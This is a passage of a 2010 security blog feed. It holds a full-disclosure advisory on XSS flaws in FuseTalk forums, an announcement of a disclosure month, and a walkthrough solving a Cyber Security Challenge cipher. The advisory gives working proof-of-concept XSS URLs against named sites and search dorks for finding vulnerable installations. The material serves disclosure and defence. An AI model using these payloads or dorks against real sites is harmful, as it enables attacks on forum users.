&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;-<br />
Status:    Public Disclosure &#8211; Not Fixed, Vendor Alerted,<br />
Awaiting Vendor Response<br />
&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;-<br />
Risk level:    Medium<br />
&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;-<br />
Credit:    Martin Hall &#8211; TheTestManager<br />
Site = <a target="_blank" href="http://www.thetestmanager.com" title="TheTestManager"  target="_self">http://www.thetestmanager.com</a><br />
twitter = <a target="_blank" href="http://www.thetestmanager.com/blog/goto/http://twitter.com/thetestmanager" title="Twitter TTM"  target="_blank">@thetestmanager</a><br />
Vulnerability Details:<br />
There exists multiple XSS errors in FuseTalk Forums.<br />
These errors exist even months/years after previous XSS HTML /SQL injection<br />
errors were reported to FuseTalk.<br />
It is time for a full and through source code review guys.<br />
&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;-<br />
Potential Users Affected = minimum = 250,000 users<br />
******* = 5664 Users<br />
FuseTalk forums = 11357 Users<br />
*** = 103488 users<br />
*** **** = 43767 users<br />
******.com = 79718 users<br />
**********.com = 31396 users<br />
********.com = 23033 users<br />
&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;-<br />
Dork to find Vulnerable Sites (1)<br />
fusetalk &#8220;users are registered&#8221;<br />
Dork to find Vulnerable Sites (2)<br />
© 1999-2010 FuseTalk Inc. All rights reserved.<br />
&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;-<br />
Sample URL&#8217;s<br />
http://forums.fusetalk.com/usersearchresults.cfm?keyword=ttm&#8211;&#8221; &gt;&lt;script&gt;alert(&#8216;TheTestManager.com- Month of Full disclosure&#8217;)&lt;/script&gt;&amp;FT_ACTION=SearchUsers &#8211; (Tested in IE8)</p>
<p>http://supportforums.*******.com/categories.aspx?catid=76&amp;FTVAR_SORT=date&amp;FTVAR_SORTORDER=0017ttm-&#8221; style=x:expression(alert(&#8220;TheTestManager&#8221;)) ttm=&#8221; (Tested in IE7)</p>
<p>&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;-<br />
Solution:<br />
Currently I&#8217;m not aware of any vendor-supplied patches or other solutions.<br />
If you are aware of more recent information related to this issue please notify me at: martin@hb-help.com</p>
<p>Users are recommended to use NoScript or other XSS mitigating software<br />
Admins are advised to change forum software, or put pressure on FuseTalk to carry out a full source code review.<br />
&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;-<br />
Other Miscellany Information<br />
<a target="_blank" href="http://www.thetestmanager.com/blog/goto/http://www.fusetalk.com/ProductsServices/FuseTalk/WhosUsingFuseTalk/tabid/72/Default.aspx" title="Potential XSS sites"  target="_blank"> http://www.fusetalk.com/ProductsServices/FuseTalk/WhosUsingFuseTalk/tabid/72/Default.aspx</a><br />
Sample URL&#8217;s</p>
<div class="feedflare">
<a href="http://feeds.feedburner.com/~ff/TheTestManagersBlog?a=YVspAWrWoJk:9_tQGEZk-Jg:yIl2AUoC8zA"><img src="http://feeds.feedburner.com/~ff/TheTestManagersBlog?d=yIl2AUoC8zA" border="0"></img></a> <a href="http://feeds.feedburner.com/~ff/TheTestManagersBlog?a=YVspAWrWoJk:9_tQGEZk-Jg:V_sGLiPBpWU"><img src="http://feeds.feedburner.com/~ff/TheTestManagersBlog?i=YVspAWrWoJk:9_tQGEZk-Jg:V_sGLiPBpWU" border="0"></img></a> <a href="http://feeds.feedburner.com/~ff/TheTestManagersBlog?a=YVspAWrWoJk:9_tQGEZk-Jg:qj6IDK7rITs"><img src="http://feeds.feedburner.com/~ff/TheTestManagersBlog?d=qj6IDK7rITs" border="0"></img></a> <a href="http://feeds.feedburner.com/~ff/TheTestManagersBlog?a=YVspAWrWoJk:9_tQGEZk-Jg:gIN9vFwOqvQ"><img src="http://feeds.feedburner.com/~ff/TheTestManagersBlog?i=YVspAWrWoJk:9_tQGEZk-Jg:gIN9vFwOqvQ" border="0"></img></a>
</div><img src="http://feeds.feedburner.com/~r/TheTestManagersBlog/~4/YVspAWrWoJk" height="1" width="1"/>]]></content:encoded>
			<wfw:commentRss>http://www.thetestmanager.com/blog/2010/08/03/full-disclosure-multiple-xss-holes-in-fusetalk-forum-software/feed/</wfw:commentRss>
		<slash:comments>2</slash:comments>
		<feedburner:origLink>http://www.thetestmanager.com/blog/2010/08/03/full-disclosure-multiple-xss-holes-in-fusetalk-forum-software/</feedburner:origLink></item>
		<item>
		<title>And So it Begins. – August = Month of Full Disclosure</title>
		<link>http://feedproxy.google.com/~r/TheTestManagersBlog/~3/Iv4mBLONmTU/</link>
		<comments>http://www.thetestmanager.com/blog/2010/08/02/and-so-it-begins-august-month-of-full-disclosure/#comments</comments>
		<pubDate>Mon, 02 Aug 2010 13:29:43 +0000</pubDate>
		<dc:creator>admin</dc:creator>
				<category><![CDATA[Month of Full Disclosure]]></category>
		<category><![CDATA[Today's News]]></category>
		<category><![CDATA[WebAppSec]]></category>
		<category><![CDATA[XSS]]></category>

		<guid isPermaLink="false">http://www.thetestmanager.com/?p=326</guid>
		<description><![CDATA[As the main title of this post states, August 2010 will be a full disclosure month. Normally within a month I may talk to around 20 or so organisations advising them of general bugs and security issues within their products or websites. The number varies as I do this as a hobby and not a [...]]]></description>
			<content:encoded><![CDATA[<div class="wp-caption alignleft" style="width: 262px"><img class=" " title="All Your Base" src="http://www.thetestmanager.com/pics/Blog/all_your_base.jpg" alt="All Your Base" width="252" height="202" /><p class="wp-caption-text">Month of Full Disclosure</p></div>
<p>As the main title of this post states, August 2010 will be a full disclosure month.</p>
<p>Normally within a month I may talk to around 20 or so organisations advising them of general bugs and security issues within their products or websites. The number varies as I do this as a hobby and not a full time job.</p>
<p>My main job is as a Systems Test Manager.</p>
<p>So I decided to see what happens if I take a month out from doing things the normal way of disclosing all issues to the site or software house first and only when fixes place advising the users.  So for August only I&#8217;ll be advising the public at the same time as advising the site / or software house involved.</p>
<p>All issues discovered before the month of August and any that are currently being discussed with sites or software houses are not included and will remain closed for public consumption until the issue is fixed and even then only if the company involves gives permission.</p>
<p>I doubt if any humdingers will come out but you never know</p>
<p>If any issues are found which could affect a very high number of users data at risk then I will revert to responsible disclosure, and give the vendor time to fix the issue.</p>
<p> <img src='http://www.thetestmanager.com/blog/wp-includes/images/smilies/icon_smile.gif' alt=':-)' class='wp-smiley' /> </p>
<p>Martin Hall</p>
<div class="feedflare">
<a href="http://feeds.feedburner.com/~ff/TheTestManagersBlog?a=Iv4mBLONmTU:xGZ4N4U4bzA:yIl2AUoC8zA"><img src="http://feeds.feedburner.com/~ff/TheTestManagersBlog?d=yIl2AUoC8zA" border="0"></img></a> <a href="http://feeds.feedburner.com/~ff/TheTestManagersBlog?a=Iv4mBLONmTU:xGZ4N4U4bzA:V_sGLiPBpWU"><img src="http://feeds.feedburner.com/~ff/TheTestManagersBlog?i=Iv4mBLONmTU:xGZ4N4U4bzA:V_sGLiPBpWU" border="0"></img></a> <a href="http://feeds.feedburner.com/~ff/TheTestManagersBlog?a=Iv4mBLONmTU:xGZ4N4U4bzA:qj6IDK7rITs"><img src="http://feeds.feedburner.com/~ff/TheTestManagersBlog?d=qj6IDK7rITs" border="0"></img></a> <a href="http://feeds.feedburner.com/~ff/TheTestManagersBlog?a=Iv4mBLONmTU:xGZ4N4U4bzA:gIN9vFwOqvQ"><img src="http://feeds.feedburner.com/~ff/TheTestManagersBlog?i=Iv4mBLONmTU:xGZ4N4U4bzA:gIN9vFwOqvQ" border="0"></img></a>
</div><img src="http://feeds.feedburner.com/~r/TheTestManagersBlog/~4/Iv4mBLONmTU" height="1" width="1"/>]]></content:encoded>
			<wfw:commentRss>http://www.thetestmanager.com/blog/2010/08/02/and-so-it-begins-august-month-of-full-disclosure/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		<feedburner:origLink>http://www.thetestmanager.com/blog/2010/08/02/and-so-it-begins-august-month-of-full-disclosure/</feedburner:origLink></item>
		<item>
		<title>cybersecuritychallenge cipher – A How To</title>
		<link>http://feedproxy.google.com/~r/TheTestManagersBlog/~3/WbBxKs2-tQs/</link>
		<comments>http://www.thetestmanager.com/blog/2010/07/27/cybersecuritychallenge-cipher-a-how-to/#comments</comments>
		<pubDate>Tue, 27 Jul 2010 23:11:33 +0000</pubDate>
		<dc:creator>admin</dc:creator>
				<category><![CDATA[Today's News]]></category>

		<guid isPermaLink="false">http://www.thetestmanager.com/?p=313</guid>
		<description><![CDATA[This is the total walk through and it wasn&#8217;t easy. (1) first go to the main challenge page and then grab the cypher https://cybersecuritychallenge.org.uk/docs/cybersecuritychallenge.txt Now from looking at the text you can see the obvious thing and that is it looks like a base64 encode. This can be seen in the fact that base64 encodes [...]]]></description>
			<content:encoded><![CDATA[<div class="wp-caption alignleft" style="width: 256px"><img title="Cyber Challenge" src="http://www.thetestmanager.com/pics/Blog/crowdflags.jpg" alt="Cyber Challenge" width="246" height="300" /><p class="wp-caption-text">Cyber Challenge</p></div>
<p>This is the total walk through and it wasn&#8217;t easy.</p>
<p>(1) first go to the main challenge page and then grab the cypher</p>
<p><a target="_blank" href="http://www.thetestmanager.com/blog/goto/https://cybersecuritychallenge.org.uk/docs/cybersecuritychallenge.txt" title="chalenge text"  target="_blank">https://cybersecuritychallenge.org.uk/docs/cybersecuritychallenge.txt</a></p>
<p>Now from looking at the text you can see the obvious thing and that is it looks like a base64 encode. This can be seen in the fact that base64 encodes will end in an equal sign if the total bits of data cannot be equally converted from 34 bits to 32 bits.</p>
<p>So we grab the text and run it through a base64 converter.</p>
<p><a target="_blank" href="http://www.thetestmanager.com/blog/goto/http://www.opinionatedgeek.com/dotnet/tools/base64decode/" title="base64 decode"  target="_blank">http://www.opinionatedgeek.com/dotnet/tools/base64decode/</a></p>
<p>This then give us a raw .bin file</p>
<p>I recommend using a Hex file viewer, however I used EditPlus Text Editor as it was closer to hand.</p>
<p>I saw what looked like a file header</p>
<p>it had EXIF (which I know to usually mean camera files).</p>
<p>and more importantly I also saw JFIF which is the <em>JPEG File Interchange Format</em> (<em>JFIF</em>)</p>
<p>From here I guessed that I would firstly grab <a target="_blank" href="http://www.thetestmanager.com/blog/goto/http://www.sno.phy.queensu.ca/~phil/exiftool/" title="EXIF TOOL"  target="_blank">EXIF Tool</a> to decode and potential EXIF data as I thought it would have a message hidden in the camera name or something similar.</p>
<p>There was no interesting info so I just changed the file extension to JPG and thought I would check what I had and then I saw the XKCD comic.</p>
<p>Personally my fave one is</p>
<p><a target="_blank" href="http://www.thetestmanager.com/blog/goto/http://xkcd.com/327/" title="Exploits of a Mum"  target="_blank">Exploits of a Mum</a></p>
<p>however you one is</p>
<p><img class="alignnone" title="DecodedBase64.jpg" src="http://www.thetestmanager.com/pics/Blog/DecodedBase64.jpg" alt="DecodedBase64.jpg" width="350" height="175" /></p>
<p>Total Time Start to Finish = 12 minutes.</p>
<p>**EDIT**</p>
<p>I was informed this morning that I was not quite there. I got a tweet from@<strong><a target="_blank" href="http://www.thetestmanager.com/blog/goto/http://twitter.com/Cyberchallenge" >Cyberchallenge</a> </strong>stating that if I sent my email about the cipher to a certain email address then I had got it wrong<strong>.</strong></p>
<p>So I thought back to the drawing board and lets look again at the image. Firstly look in a Hex Editor and I saw what I thought was a phone number. 01444.&#8217;9=82&lt;.342 = 01444-982-342 well it would seem that I was on the wrong track as that number is not in service.</p>
<p>So I then loaded up another EXIF viewer and again nothing.</p>
<p>I then looked at the original image on the XKCS site and I noticed that it was a PNG and not a JPG, if it was just a case of getting the normal image when why change its extension and also why all the extra white space.</p>
<p>I then carried out a quick check on <a target="_blank" href="http://www.thetestmanager.com/blog/goto/http://www.tineye.com" title="TINEYE" >TINEYE</a>. (which is a great tool). however this also gave nothing except it did let me compare other images out there against the one I had earlier decoded and my image was the only one with the morse code around the edge.</p>
<p>I then looked a little closer and thought it was binary. Also like the pits used when burning the lead in section of a protected DVD / CD.</p>
<p>I then read up on hiding binary in images. &#8211; Suggested reads are.</p>
<p><a target="_blank" href="http://www.thetestmanager.com/blog/goto/http://terpconnect.umd.edu/~minwu/public_paper/Jnl/0408binwmk_IEEEfinal_TMM.pdf" >http://terpconnect.umd.edu/~minwu/public_paper/Jnl/0408binwmk_IEEEfinal_TMM.pdf</a></p>
<p><a target="_blank" href="http://www.thetestmanager.com/blog/goto/http://figment.cse.usf.edu/~sfefilat/data/papers/TuBCT9.10.pdf"  target="_blank">http://figment.cse.usf.edu/~sfefilat/data/papers/TuBCT9.10.pdf</a></p>
<p><a target="_blank" href="http://www.thetestmanager.com/blog/goto/http://www.springerlink.com/content/k28787j31153565m/" >http://www.springerlink.com/content/k28787j31153565m/</a></p>
<p>I then loaded up Paint.Net and began to play.</p>
<p>Firstly looking at the Histograms. If you move them around you&#8217;ll see that the boarder is a different layer than the rest of the image.</p>
<p>This then confirmed to me it was binary and all I had to do was to try and count the pixels to see where a binary code started and ended.</p>
<p>Paint.Net has a Pixel grid so I loaded this up and began to count.</p>
<p>White Pixels = Zero and Black Pixels = One</p>
<p>010000110111100101110010011011100110011001110010001000000111001101100010011110010111100101100010 and so on and so on</p>
<p>I then grabbed the text and loaded that into a <a target="_blank" href="http://www.thetestmanager.com/blog/goto/http://www.roubaixinteractive.com/PlayGround/Binary_Conversion/Binary_To_Text.asp" >binary to string converter</a> and this gave me garbled text.  = Cyrnfr sbyyb in the example above.</p>
<p>I then used google to check the text and I found only one result and it was 2007 on a site called <a target="_blank" href="http://www.thetestmanager.com/blog/goto/http://www.perlmonks.org/bare/?node_id=605536" title="Perl Monks"  target="_blank">Perl Monks</a></p>
<p>This thread has some one attempting to decode a piece of text and it has one of our words. = Cyrnfr</p>
<p>It was suggested Rotr13, so again I read up on Rotr13 and its a simple encryption where the letters are rotated 13 chars . So this gave me Please follo (looks like please follow)</p>
<p>I now knew that i was right about the binary and all I had to do is to count the whole image and then rotate each of the letter 13 places.</p>
<p>This then gave me</p>
<p>Please follow this link:      <a target="_blank" href="http://www.thetestmanager.com/blog/goto/https://cybersecuritychallenge.org.uk/834jtp.html" title="autolink"  target="_blank">https://cybersecuritychallenge.org.uk/834jtp.html</a> <a target="_blank" href="http://www.thetestmanager.com/blog/goto/https://cybersecuritychallenge.org.uk/834jtp.html" title="autolink"  target="_blank">https://cybersecuritychallenge.org.uk/834jtp.html</a></p>
<p>Game Over -  ** at least that&#8217;s what I thought **</p>
<p><strong>I</strong> visited the URL and got a new code !! &#8211; this one although easier actually took longer as it was custom code and I didn&#8217;t bother to code a parser (which I now wish I had done) so I had to decode it all by hand.</p>
<p>68edcdec4e2c8eae8d2c8e2dedcd6e04d2042fedae52ceac04ccedaecd8c042ccd8c046</p>
<p>cedad0e8dac8eac8c048e0dac044aa82889046c0d2c8d8daccdecacc5042bedae4e04e</p>
<p>e2dcd046ced8cac042d6e04046c2f4c664ea76e666cae4e268e2f456c0d088d8d66cde</p>
<p>cac6546c6a506e6a546062606c504a141a1410a8dac2c6eac04acad2c2d8d048e0d2d</p>
<p>6e046ced8cac048eed04edae4e048eac2cad042c8e04adac8c2d2c086c2f4cac4e6eac</p>
<p>6cae4e2d8e2f6c0d2c8d8daccdecacc5ed4eecc5ae6dc50429cc042fedae524eac048e</p>
<p>0dac04cc2d4e6e8e040eac4e6eedcd048eed048ced046eed85042ccd8c046c2ccd0</p>
<p>40e4eedceac042fedae04adacac8e048e0dac04ac8d2dec2d4c2d8d2d8e2f046c4e2d</p>
<p>8eac4e2d2c0405484e2d8e2d6e0d046c2d8e2d4faccd046cae4e4eaccd8e8d2f044ea</p>
<p>c6e2d8caccd8e042dcd048e0dac04aa692504eeac04ee2d8d8d044cac042dcd048ee</p>
<p>dae6c0d048eed042c8cce2d6eac040dedee048eed046c8d2c2dad042fedae4e040e4e</p>
<p>2d4facc504eaac8d8d048cedcdac042ccd8c04eceded8c048dae6c6d042dcd048e0da</p>
<p>c04682f4cac4e046aac6cae4e2d8e2f04680d2c8d8daccdecac046cedad0eac8e2d8e2</p>
<p>dedcd6e048e2c6d2dcdec040e8d2c6cac048e0d4eedaeec0dedae8e048e0dac044eac</p>
<p>6e8e04edcc048e0dac042fac2c4ec5</p>
<p>The part that gave the code away was that I figured it would start with a well done message so I counted the chars and looked for well done or other words like congratulations. (it was all hex so it wasn&#8217;t too hard)  I was right about the congrats message plus the fact that the spaces were easy to guess.  I still ended up with a few question marks but I still got to the bottom of it.</p>
<p>see below for the key and the cracked code.</p>
<p>04 = space<br />
0D = H<br />
0E = P<br />
08 = a<br />
26 = i?<br />
2B = y?<br />
2C = A<br />
2D = I<br />
2F = Y<br />
4C = B<br />
4E = R<br />
4F = Z<br />
52 = &#8216;<br />
66 = e?<br />
68 = C<br />
6c = c<br />
6D = k<br />
6E = s<br />
8C = D<br />
8D = L<br />
8E = T<br />
AC = E<br />
AD = M<br />
AE = U<br />
C5 = fullstop<br />
CC = F<br />
CD = N<br />
CE = V<br />
D2 = A<br />
ea = W<br />
EC = G<br />
ED = O<br />
EE = w</p>
<p>a7 =?<br />
45 = ?<br />
65 = ?<br />
46 = ?<br />
c6 = ?<br />
A1 = ?<br />
41 = ?</p>
<p><strong>congratulations a youve found and completed the ???? challenge.<br />
your pin code is  cyber?security?challenge???????????. ?????lease<br />
email this code to our team to media@Cybersecuritychallenge.org.uk</strong></p>
<p><strong>F YOU&#8217;re The First Person to do so and can prove you meet the eligibility<br />
criteria ? ? British citizen currently resident in the ??? we will be in<br />
touch to advise how to claim your prize.</strong></p>
<p><strong>Well done and good luck in the Cyber Security Challenge Competitions taking<br />
place throughout the rest of the year.</strong></p>
<div class="feedflare">
<a href="http://feeds.feedburner.com/~ff/TheTestManagersBlog?a=WbBxKs2-tQs:wsR8hDhQ0cI:yIl2AUoC8zA"><img src="http://feeds.feedburner.com/~ff/TheTestManagersBlog?d=yIl2AUoC8zA" border="0"></img></a> <a href="http://feeds.feedburner.com/~ff/TheTestManagersBlog?a=WbBxKs2-tQs:wsR8hDhQ0cI:V_sGLiPBpWU"><img src="http://feeds.feedburner.com/~ff/TheTestManagersBlog?i=WbBxKs2-tQs:wsR8hDhQ0cI:V_sGLiPBpWU" border="0"></img></a> <a href="http://feeds.feedburner.com/~ff/TheTestManagersBlog?a=WbBxKs2-tQs:wsR8hDhQ0cI:qj6IDK7rITs"><img src="http://feeds.feedburner.com/~ff/TheTestManagersBlog?d=qj6IDK7rITs" border="0"></img></a> <a href="http://feeds.feedburner.com/~ff/TheTestManagersBlog?a=WbBxKs2-tQs:wsR8hDhQ0cI:gIN9vFwOqvQ"><img src="http://feeds.feedburner.com/~ff/TheTestManagersBlog?i=WbBxKs2-tQs:wsR8hDhQ0cI:gIN9vFwOqvQ" border="0"></img></a>
</div><img src="http://feeds.feedburner.com/~r/TheTestManagersBlog/~4/WbBxKs2-tQs" height="1" width="1"/>]]></content:encoded>
			<wfw:commentRss>http://www.thetestmanager.com/blog/2010/07/27/cybersecuritychallenge-cipher-a-how-to/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		<feedburner:origLink>http://www.thetestmanager.com/blog/2010/07/27/cybersecuritychallenge-cipher-a-how-to/</feedburner:origLink></item>
	</channel>
</rss>
